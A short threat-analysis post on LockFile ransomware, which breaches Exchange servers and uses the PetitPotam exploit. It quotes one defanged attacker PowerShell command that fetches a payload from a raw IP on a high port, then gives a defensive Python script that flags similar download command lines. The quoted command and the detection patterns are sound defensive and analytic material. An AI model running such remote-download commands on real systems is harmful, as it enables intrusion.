Tuesday, May 17, 2022

LockFile: Ransomware Uses PetitPotam Exploit to Compromise Windows Domain Controllers

Attack chain

Exchange servers are compromised through an as yet unidentified technique. On exploitation, the attacker executes a PowerShell command such as the following:

powershell wget hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH

Other powershell wget commands to the same IP address use similar seemingly random high port numbers. It is unknown exactly what is downloaded by the PowerShell command; however, the attackers maintain access on victim networks for at least several days before …
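A defender-side triage check for the pattern described above, added here as an example and not part of the original post: it scores process-creation command lines for PowerShell invoking a download alias (wget, curl and iwr are Windows PowerShell aliases of Invoke-WebRequest) against a bare IP address on a high, non-standard port with an opaque alphanumeric path. The sample command lines, hosts and ports below are constructed, and the function names are my own.

```python
import re
from ipaddress import ip_address

# Constructed sample command lines shaped like Sysmon EID 1 / Security 4688 fields.
# They are not real telemetry; hosts are documentation-range addresses.
SAMPLE_CMDLINES = [
    r'powershell wget http://203.0.113.5:46613/VcEtrKighyIFS5foGNXH',
    r'powershell.exe -nop -w hidden iwr http://203.0.113.5:51207/aBcDeFgHiJkLmNoPqRsT',
    r'powershell Invoke-WebRequest https://updates.example.com/agent.msi -OutFile C:\Temp\agent.msi',
    r'powershell -Command "wget https://198.51.100.7/file.txt"',
    r'cmd.exe /c dir',
]

# wget, curl and iwr are aliases of Invoke-WebRequest in Windows PowerShell 5.1.
DOWNLOAD_CMDLETS = r'(?:wget|curl|iwr|Invoke-WebRequest|irm|Invoke-RestMethod|Start-BitsTransfer)'
PS_RE = re.compile(r'\bpowershell(?:\.exe)?\b', re.I)
CMDLET_RE = re.compile(r'\b' + DOWNLOAD_CMDLETS + r'\b', re.I)
URL_RE = re.compile(r'https?://([^/\s:"\']+)(?::(\d{1,5}))?(/[^\s"\']*)?', re.I)
# A path that is one long run of letters and digits, like the sample in the post.
RANDOM_PATH_RE = re.compile(r'^/[A-Za-z0-9]{16,}$')

def is_ip(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False

def score_cmdline(cmdline):
    """Return (score, reasons) for one command line; 0 means no download pattern."""
    reasons = []
    if not PS_RE.search(cmdline) or not CMDLET_RE.search(cmdline):
        return 0, reasons
    m = URL_RE.search(cmdline)
    if not m:
        return 0, reasons
    host, port, path = m.group(1), m.group(2), m.group(3) or ''
    score = 1
    reasons.append('powershell download cmdlet or alias')
    if is_ip(host):
        score += 2; reasons.append('bare IP host')
    if port and int(port) > 1024 and int(port) not in (8080, 8443):
        score += 2; reasons.append(f'non-standard port {port}')
    if RANDOM_PATH_RE.match(path):
        score += 1; reasons.append('opaque alphanumeric path')
    return score, reasons

def find_suspicious(cmdlines, threshold=4):
    """Return (cmdline, score, reasons) for every line at or above the threshold."""
    return [(c, s, r) for c in cmdlines for s, r in [score_cmdline(c)] if s >= threshold]

if __name__ == '__main__':
    for cmd, score, why in find_suspicious(SAMPLE_CMDLINES):
        print(score, cmd, '|', ', '.join(why))
```

Tune the threshold to your environment: a legitimate installer fetched by hostname scores 1, a raw-IP download on a default port scores 3, and the pattern from this campaign scores 6.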

